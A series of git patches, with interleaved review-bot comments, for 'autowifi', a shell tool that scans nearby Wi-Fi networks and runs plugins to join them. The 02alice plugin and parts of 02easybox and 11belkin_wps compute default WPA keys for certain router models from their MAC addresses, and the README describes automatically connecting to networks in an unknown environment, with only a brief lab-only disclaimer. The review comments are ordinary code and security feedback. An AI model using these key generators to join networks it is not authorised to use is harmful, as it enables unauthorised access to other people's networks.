From 11d994c0a822f83b311ce9a63d1f3dc3c29c7039 Mon Sep 17 00:00:00 2001 From: makefu Date: Wed, 26 Jun 2013 13:09:44 +0200 Subject: refactor vendor matcher --- usr/lib/autowifi/lib/plugin_core | 26 ++++++++++++++++++++------ usr/lib/autowifi/plugins/11belkin_wps | 9 ++------- 2 files changed, 22 insertions(+), 13 deletions(-) diff --git a/usr/lib/autowifi/lib/plugin_core b/usr/lib/autowifi/lib/plugin_core index da003350..1b83b0c3 100644 --- a/usr/lib/autowifi/lib/plugin_core +++ b/usr/lib/autowifi/lib/plugin_core @@ -1,24 +1,38 @@ +#!/bin/sh parse_plugin_args(){ [ $# -ne 4 ] && plugin_usage && exit 1 # convenience function to put args in ENV variables ESSID="$1" - MAC="$2" + + # mac is returned without colon + MAC=$(printf "%s" "$2" | sed 's/://g') + # split up the mac address to vendor and private part + VENDOR_MAC=${MAC:0:6} + PRIVATE_MAC=${MAC:6:12} CHANNEL="$3" ENC="$4" - if [ ${#MAC} -ne 17 ] ;then + if [ ${#MAC} -ne 12 ] ;then echo "MAC malformed" exit 1 fi } plugin_usage(){ cat << EOF -usage: $0 ESSID MAC CHANNEL ENC WPA WPA2" +usage: $0 ESSID MAC CHANNEL ENC" ESSID - string MAC - 00:11:22:33:44:55 - ENC - on | off - WPA - 0 | 1 - WPA2 - 0 | 1 + CHANNEL - 4 + ENC - wpa EOF } + +check_vendor_mac(){ + needle="$(printf $1 | tr '[A-Z]' '[a-z]')" + shift + for i in "$@";do + [ "$needle" == "$(printf $i | tr '[A-Z]' '[a-z]')" ] && return 0 + done + return 1 +} diff --git a/usr/lib/autowifi/plugins/11belkin_wps b/usr/lib/autowifi/plugins/11belkin_wps index 82140523..65e08624 100755 --- a/usr/lib/autowifi/plugins/11belkin_wps +++ b/usr/lib/autowifi/plugins/11belkin_wps 
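Review bot: The new parse_plugin_args slices MAC with `${MAC:0:6}` and `${MAC:6:12}` before the length check, and never checks that it is hexadecimal, although 02alice later in this series puts it into an arithmetic expression. Validate right after stripping the colons, e.g. `case "$MAC" in *[!0-9A-Fa-f]*) echo "MAC malformed" >&2; exit 1;; esac`, and move the `${#MAC} -ne 12` test above the slicing. The substring expansions and the `==` inside `[ ]` in check_vendor_mac are bash syntax, but this file is sourced by plugins that start with `#!/bin/sh`, so a strict POSIX shell such as dash will reject them. check_vendor_mac also passes its arguments as the printf format; `printf '%s' "$1"` and `printf '%s' "$i"` avoid that. `${MAC:6:12}` asks for 12 characters where only 6 remain, and the usage text keeps a stray `"` after `ENC`.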
@@ -15,13 +15,8 @@ cd $(dirname $(readlink -f $0)) . ../lib/wps parse_plugin_args "$@" -MAC=$(printf "%s" $MAC| sed 's/://g') -VENDOR_MAC=${MAC:0:6} -PRIVATE_MAC=${MAC:6:12} -if ! [ $VENDOR_MAC == "002275" -o $VENDOR_MAC == "001CDF" -o $VENDOR_MAC == "09863B" ] ;then - echo "VENDOR MAC $VENDOR_MAC not affected" - exit 1 -fi + +! check_vendor_mac "$VENDOR_MAC" 002275 001CDF 09863B && echo "VENDOR MAC $VENDOR_MAC not affected" && exit 1 calc_belkin(){ PRIVATE_MAC=${1} -- cgit v1.2.3 From b72b8a29dcfaf22554ebcf7d5e19bc7f28f49862 Mon Sep 17 00:00:00 2001 From: makefu Date: Wed, 26 Jun 2013 13:11:59 +0200 Subject: add alicebox default wpa key generator --- usr/lib/autowifi/plugins/02alice | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100755 usr/lib/autowifi/plugins/02alice diff --git a/usr/lib/autowifi/plugins/02alice b/usr/lib/autowifi/plugins/02alice new file mode 100755 index 00000000..1b4533a4 --- /dev/null +++ b/usr/lib/autowifi/plugins/02alice @@ -0,0 +1,20 @@ +#!/bin/sh +# Implementation of Alicebox 1121 /Siemens S1621-Z220-A Default Password Algorithm: +# Based on Poc from +# http://www.wardriving-forum.de/forum/f275/standard-wlanpassw%F6rter-von-alice-boxen-70287.html +# +# +# ESSID MAC CHANNEL ENCRYPTION + +cd $(dirname $(readlink -f $0)) +. ../lib/plugin_core + +parse_plugin_args "$@" + +! check_vendor_mac $VENDOR_MAC "00255E" && echo "$VENDOR_MAC not affected" && exit 1 + +# printf always makes string to lower, need that for correct md5sum +ETHMAC=$( printf "%012x" $((0x${MAC}-1)) ) +TMP=$(printf $ETHMAC | md5sum) +printf ${TMP:0:12} | base64 +exit 0 -- cgit v1.2.3 From a0f4644017949e17b45f23a3870afa6f6c2823cb Mon Sep 17 00:00:00 2001 From: makefu Date: Wed, 26 Jun 2013 13:25:03 +0200 Subject: use wpa_supplicant for the new autowifi_dryrun --- usr/bin/autowifi_dryrun | 40 +++++++++++++++++++--------------------- 1 file changed, 19 insertions(+), 21 deletions(-) 
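Review bot: The "not affected" message in the new one-liner goes to stdout, the same stream on which 02alice in this series prints its computed key, so a caller that captures plugin output may take the diagnostic for a result. How the caller reads plugin output is not visible in this diff, so this is inferred. Send it to stderr: `echo "VENDOR MAC $VENDOR_MAC not affected" >&2`. The same applies to the equivalent messages added in 02alice and 02easybox.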
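Review bot: `cd $(dirname $(readlink -f $0))` is unquoted and unchecked, so if the cd fails the next line sources `../lib/plugin_core` relative to whatever directory the caller was in. The README in this series says to run everything as root, so the script should stop instead: `cd "$(dirname "$(readlink -f "$0")")" || exit 1`. The same line is context in the 11belkin_wps hunk and is added again in 02easybox. `$((0x${MAC}-1))` evaluates MAC inside an arithmetic expression after only a length check, so it should run only once MAC is confirmed to be 12 hex digits. `printf $ETHMAC` and `printf ${TMP:0:12}` pass data as the format string, and the substring expansion is bash-only under `#!/bin/sh`; `printf '%s' "$ETHMAC"` is the safe form.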
diff --git a/usr/bin/autowifi_dryrun b/usr/bin/autowifi_dryrun index 1df94119..8860b4a6 100755 --- a/usr/bin/autowifi_dryrun +++ b/usr/bin/autowifi_dryrun @@ -2,30 +2,23 @@ # ENV: # the root directory (e.g. root=$PWD/../../ if run from here ) cd $(dirname $(readlink -f $0)) -root=${root:-/} -wifi=${wifi:-wlan0} - test "${1:-}" = 'quiet' && exec 2>&- -# for iwlist_scan -. $root/usr/lib/autowifi/lib/iwlist +interface=${interface:-wlan0} +root=${root:-../../} +crackdir=$root/usr/lib/autowifi/plugins +wifi_keys=$root/etc/autowifi/wifi_keys +wifi_log=$root/var/log/autowifi.log -# . $ROOT/usr/lib/autowifi/lib/ +# exists() run_hooks() +. $root/usr/lib/autowifi/lib/core -# for check_internet and check_gateway -# . /usr/lib/autowifi/lib/network +# start_wpa_supplicant() +. $root/usr/lib/autowifi/lib/wpa_supplicant crack_wifi(){ - #SSID MAC CHANNEL ENCRYPTION WPA WPA2 - if [ "$4" == off ];then - encr=open - elif [ "$6" -eq 1 ]; then - encr=psk2 - elif [ "$5" -eq 1 ]; then - encr=psk - elif [ "$4" == on ]; then - encr=wep - fi + #SSID MAC CHANNEL ENCRYPTION + ALL_RET=1 for hack in $(find $root/usr/lib/autowifi/plugins -type f | sort -n); do printf "%s" "Trying $(basename $hack) against $1 : " >&2 @@ -41,13 +34,18 @@ crack_wifi(){ done return $ALL_RET } +wifi_init(){ + wpa_supplicant_is_usable || start_wpa_supplicant /tmp/autowifi.wpa_supplicant + wifi_scan > /tmp/${interface}.scan + . /tmp/${interface}.scan +} loop_over_networks(){ - . /tmp/${wifi}.scan + wifi_init + echo "SSID:MAC:CHANNEL:ENCRYPTION:key" for i in `seq 1 $WIFI_COUNT`; do - eval crack_wifi \"\${ESSID_${i}}\" \${MAC_${i}} \${CHANNEL_${i}} \${ENCRYPTION_${i}} \${WPA_${i}} \${WPA2_${i}} + eval crack_wifi \"\${ESSID_${i}}\" \${MAC_${i}} \${CHANNEL_${i}} \${ENCRYPTION_${i}} done } -iwlist_scan > /tmp/${wifi}.scan loop_over_networks -- cgit v1.2.3 From 410ddbd1f77e2f65de6e6b6c86daf031e296028d Mon Sep 17 00:00:00 2001 
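Review bot: wifi_init writes the scan to the fixed path `/tmp/${interface}.scan` and then sources it, so on a multi-user system another local user can pre-create or replace that file (or a symlink) before a root-run autowifi_dryrun reads it as shell code. Create the file with `mktemp` and source that path, as sketched below. `/tmp/autowifi.wpa_supplicant` is also a fixed name, though what start_wpa_supplicant does with it is not visible here. Sourcing scan results also assumes that wifi_scan, defined outside this diff, shell-quotes SSIDs, which are chosen by whoever operates the access point. In loop_over_networks the `eval` leaves `\${MAC_${i}}`, `\${CHANNEL_${i}}` and `\${ENCRYPTION_${i}}` unquoted, so a bracketed value like the README's `[wpa]` is open to globbing; quote each as the ESSID is, here and in the later CHANNEL-to-FREQ hunk of this file.

```shell
wifi_init(){
  wpa_supplicant_is_usable || start_wpa_supplicant /tmp/autowifi.wpa_supplicant
  # private, unpredictable file instead of /tmp/${interface}.scan
  scan_file=$(mktemp) || return 1
  wifi_scan > "$scan_file"
  . "$scan_file"
  rm -f -- "$scan_file"
}
```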
From: makefu Date: Wed, 26 Jun 2013 13:26:15 +0200 Subject: fix multiple wifi_init --- usr/bin/autowifi | 8 ++------ 1 file changed, 2 insertions(+), 6 deletions(-) diff --git a/usr/bin/autowifi b/usr/bin/autowifi index d9337cf4..1969e650 100755 --- a/usr/bin/autowifi +++ b/usr/bin/autowifi @@ -63,7 +63,6 @@ find_count_of_ssid(){ connect_to_network_by_ssid(){ - wifi_init find_count_of_ssid "$1" | (while read i do loop_over_cracks "$i" && exit 0 @@ -76,7 +75,6 @@ connect_to_network_by_ssid(){ } connect_with_pw(){ - wifi_init find_count_of_ssid "$1" | (while read i do KEY="$2" @@ -92,8 +90,8 @@ wifi_init(){ . /tmp/${interface}.scan } loop_over_networks(){ - wifi_init + wifi_init for i in `seq 1 $WIFI_COUNT`; do loop_over_cracks "$i" if [ $? -eq 0 ]; then @@ -144,9 +142,7 @@ loop_over_cracks(){ # exit 0 #} - - - +wifi_init if [ -n "$2" ]; then echo connecting to $1 with pw $2 connect_with_pw "$1" "$2" -- cgit v1.2.3 From 07740b90c9803ca41e1ef931277a65ebcd4bfcd8 Mon Sep 17 00:00:00 2001 From: makefu Date: Wed, 26 Jun 2013 13:34:39 +0200 Subject: CHANNEL is FREQ in wpa_supplicant parser --- usr/bin/autowifi_dryrun | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/usr/bin/autowifi_dryrun b/usr/bin/autowifi_dryrun index 8860b4a6..c9867106 100755 --- a/usr/bin/autowifi_dryrun +++ b/usr/bin/autowifi_dryrun @@ -17,7 +17,7 @@ wifi_log=$root/var/log/autowifi.log . $root/usr/lib/autowifi/lib/wpa_supplicant crack_wifi(){ - #SSID MAC CHANNEL ENCRYPTION + #SSID MAC FREQ ENCRYPTION ALL_RET=1 for hack in $(find $root/usr/lib/autowifi/plugins -type f | sort -n); do @@ -42,9 +42,9 @@ wifi_init(){ loop_over_networks(){ wifi_init - echo "SSID:MAC:CHANNEL:ENCRYPTION:key" + echo "SSID:MAC:FREQ:ENCRYPTION:key" for i in `seq 1 $WIFI_COUNT`; do - eval crack_wifi \"\${ESSID_${i}}\" \${MAC_${i}} \${CHANNEL_${i}} \${ENCRYPTION_${i}} + eval crack_wifi \"\${ESSID_${i}}\" \${MAC_${i}} \${FREQ_${i}} \${ENCRYPTION_${i}} done } -- cgit v1.2.3 
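Review bot: loop_over_networks still calls `wifi_init` on the new side of the third usr/bin/autowifi hunk, while the last hunk adds an unconditional top-level `wifi_init` before the argument dispatch. Any path that ends in loop_over_networks would therefore scan twice, which is the duplication this commit sets out to remove. Drop the call inside loop_over_networks, or, if a rescan on each pass is intended, say so with a comment such as `# rescan on every pass; the top-level wifi_init covers the connect_* paths`. Which branch of the dispatch reaches loop_over_networks lies outside the hunks, so the double call is inferred.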
From 9fe9479fcaf843edd262acc28ad4bd71f475a246 Mon Sep 17 00:00:00 2001 From: makefu Date: Wed, 26 Jun 2013 14:00:11 +0200 Subject: 02easybox uses plugin_core now --- usr/lib/autowifi/plugins/02easybox | 19 +++++++++---------- 1 file changed, 9 insertions(+), 10 deletions(-) diff --git a/usr/lib/autowifi/plugins/02easybox b/usr/lib/autowifi/plugins/02easybox index 2126e17c..3d7cb8c1 100755 --- a/usr/lib/autowifi/plugins/02easybox +++ b/usr/lib/autowifi/plugins/02easybox @@ -1,21 +1,20 @@ #!/bin/sh #ESSID MAC CHANNEL ENCRYPTION WPA WPA2 -if ! echo "$1" | egrep -qi "(EasyBox-|Arcor-|Vodafone-)"; then - exit 1 -else - MAC=${2?\$2 must be MAC} - # Take the last 2 Bytes of the MAC-Address (0B:EC), and convert it to decimal. +cd $(dirname $(readlink -f $0)) +. ../lib/plugin_core +parse_plugin_args "$@" - take5=${MAC:12} - last4=${take5/:/} +if ! echo "$ESSID" | egrep -i "(EasyBox-|Arcor-|Vodafone-)" >/dev/null; then + echo "Essid $ESSID is not Default EasyBox|Arcor|Vodafone" + exit 1 +else # Fill up to 4 places with zeros, if necessary: - deci=$(printf "%04d" "0x$last4" | sed 's/.*\(....\)/\1/;s/./& /g') - #echo M4: ${deci[@]} + deci=$(printf "%04d" "0x${MAC:8:4}" | sed 's/.*\(....\)/\1/;s/./& /g') # # The digits M9 to M12 are just the last digits (9.-12.) of the MAC: - hexi=$(echo ${MAC:12:5} | sed 's/://;s/./& /g') + hexi=$(echo ${MAC:8:4} | sed 's/./& /g') #echo 'M4 (Hex): ' ${hexi[@]} # K1 = last byte of (d0 + d1 + h2 + h3) # K2 = last byte of (h0 + h1 + d2 + d3) -- cgit v1.2.3 From 1cdfbdacb0b1041808232bb3ee7f51a4da705540 Mon Sep 17 00:00:00 2001 From: makefu Date: Wed, 26 Jun 2013 14:03:20 +0200 Subject: add README --- README | 42 ++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 README diff --git a/README b/README new file mode 100644 index 00000000..c3c8f84d --- /dev/null +++ b/README 
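Review bot: The header comment `#ESSID MAC CHANNEL ENCRYPTION WPA WPA2` is stale now that the plugin calls parse_plugin_args, which in this series exits unless exactly four arguments are given; it should read `# ESSID MAC CHANNEL ENCRYPTION`. The new `${MAC:8:4}` expansions are bash-only under `#!/bin/sh`. `"0x${MAC:8:4}"` also reaches `printf "%04d"` without MAC having been checked for hex digits, so a malformed MAC surfaces as a printf error rather than a clean "MAC malformed" exit. The else branch continues past the end of the hunk.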
@@ -0,0 +1,42 @@ +# Autowifi +Author: makefu,lassulus +Status: Pre-Alpha - it will most likely break if you try to use it + +# Goals +Goal of autowifi is to provide a tool which automatically can connect to +networks in an unknown environment. + +This can either be done by connecting to open networks, known networks +(whitelist) or by calculating weak default wpa keys (for example easybox +default passwords). + +# Audience +Due to the current status of the project the target audience are +linux users with technical background . + +# Usage + + # all as root + # try to find networks to connect to around you + usr/bin/autowifi_dryrun quiet + + # start the autowifi daemon which tries to stay in networks all the time + usr/bin/autowifi + +# Plugins +All tests to open up networks are implemented in plugins in + usr/lib/autowifi/plugins + +## Run a single Plugin +This can be used for testing purposes, e.g. test a single plugin against given networks directly + + # try out the easybox keygen + usr/lib/autowifi/plugins/02easybox SSID MAC CHANNEL ENCRYPTION(wpa_cli style) + + #e.g. + usr/lib/autowifi/plugins/02easybox Easybox-123456 00:11:22:33:44:55 7 "[wpa]" + +# Disclaimer +- use at own risk +- only run in lab environment +- you break it, you buy it -- cgit v1.2.3 From caf31a97e934c3191f2867ab6a93ecf4bb8890fe Mon Sep 17 00:00:00 2001 From: makefu Date: Wed, 26 Jun 2013 17:14:18 +0200 Subject: update README --- README | 42 ------------------------------------------ README.md | 47 +++++++++++++++++++++++++++++++++++++++++++++++ 2 files changed, 47 insertions(+), 42 deletions(-) delete mode 100644 README create mode 100644 README.md diff --git a/README b/README deleted file mode 100644 index c3c8f84d..00000000 --- a/README +++ /dev/null 
@@ -1,42 +0,0 @@ -# Autowifi -Author: makefu,lassulus -Status: Pre-Alpha - it will most likely break if you try to use it - -# Goals -Goal of autowifi is to provide a tool which automatically can connect to -networks in an unknown environment. - -This can either be done by connecting to open networks, known networks -(whitelist) or by calculating weak default wpa keys (for example easybox -default passwords). - -# Audience -Due to the current status of the project the target audience are -linux users with technical background . - -# Usage - - # all as root - # try to find networks to connect to around you - usr/bin/autowifi_dryrun quiet - - # start the autowifi daemon which tries to stay in networks all the time - usr/bin/autowifi - -# Plugins -All tests to open up networks are implemented in plugins in - usr/lib/autowifi/plugins - -## Run a single Plugin -This can be used for testing purposes, e.g. test a single plugin against given networks directly - - # try out the easybox keygen - usr/lib/autowifi/plugins/02easybox SSID MAC CHANNEL ENCRYPTION(wpa_cli style) - - #e.g. - usr/lib/autowifi/plugins/02easybox Easybox-123456 00:11:22:33:44:55 7 "[wpa]" - -# Disclaimer -- use at own risk -- only run in lab environment -- you break it, you buy it diff --git a/README.md b/README.md new file mode 100644 index 00000000..62e0083b --- /dev/null +++ b/README.md 
@@ -0,0 +1,47 @@ +# Autowifi +Author: makefu,lassulus +Status: Pre-Alpha - it will most likely break if you try to use it + +# Contact + +twitter: @krebsbob ,@makefoo +IRC: freenode #krebs + +# Goals +Goal of autowifi is to provide a tool which automatically can connect to +networks in an unknown environment. + +This can either be done by connecting to open networks, known networks +(whitelist) or by calculating weak default wpa keys (for example easybox +default passwords). + +# Audience +Due to the current status of the project the target audience are +linux users with technical background . + +# Usage + + # all as root + # try to find networks to connect to around you + usr/bin/autowifi_dryrun quiet + + # start the autowifi daemon which tries to stay in networks all the time + usr/bin/autowifi + +# Plugins +All tests to open up networks are implemented in plugins in + usr/lib/autowifi/plugins + +## Run a single Plugin +This can be used for testing purposes, e.g. test a single plugin against given networks directly + + # try out the easybox keygen + usr/lib/autowifi/plugins/02easybox SSID MAC CHANNEL ENCRYPTION(wpa_cli style) + + #e.g. + usr/lib/autowifi/plugins/02easybox Easybox-123456 00:11:22:33:44:55 7 "[wpa]" + +# Disclaimer +- use at own risk +- only run in lab environment +- you break it, you buy it -- cgit v1.2.3 From b99bbe256c030cec78b1c96d08eb02860dda911c Mon Sep 17 00:00:00 2001 From: Felix Richter Date: Wed, 26 Jun 2013 17:25:35 +0200 Subject: README.md: fix line breaks --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index 62e0083b..3e0d8dce 100644 --- a/README.md +++ b/README.md @@ -1,10 +1,12 @@ # Autowifi Author: makefu,lassulus + Status: Pre-Alpha - it will most likely break if you try to use it # Contact twitter: @krebsbob ,@makefoo + IRC: freenode #krebs # Goals -- cgit v1.2.3